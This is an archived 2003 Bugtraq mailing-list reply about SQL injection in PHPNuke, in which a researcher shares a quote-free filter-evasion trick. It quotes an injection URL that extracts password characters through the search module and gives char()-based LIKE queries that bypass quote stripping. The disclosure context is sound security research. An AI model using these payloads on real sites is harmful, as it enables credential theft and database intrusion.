[28966] in bugtraq
Re: PHPNuke SQL Injection
daemon@ATHENA.MIT.EDU (Martin Eiszner)
Fri Feb 21 16:04:46 2003
Date: Fri, 21 Feb 2003 08:11:18 +0100
From: Martin Eiszner <martin@websec.org>
To: Lucas Armstrong <lucas@cgishield.com>
Message-Id: <20030221081118.33b83771.martin@websec.org>
In-Reply-To: <20030220203611.17077.qmail@www.securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
hola,
On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas@cgishield.com> wrote:
> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?
> name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
> (97)&type=stories
JFYI:
this maybe off topic but it worth mentioning .. a couple of month ago we found out
that the mysql char() function can be used within the "like() - function" to place
quotes.
this may help somebody doing sql-injection in an "quote-stripped :-)" environment.
example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---
and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---
...
nice day,
mEi
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
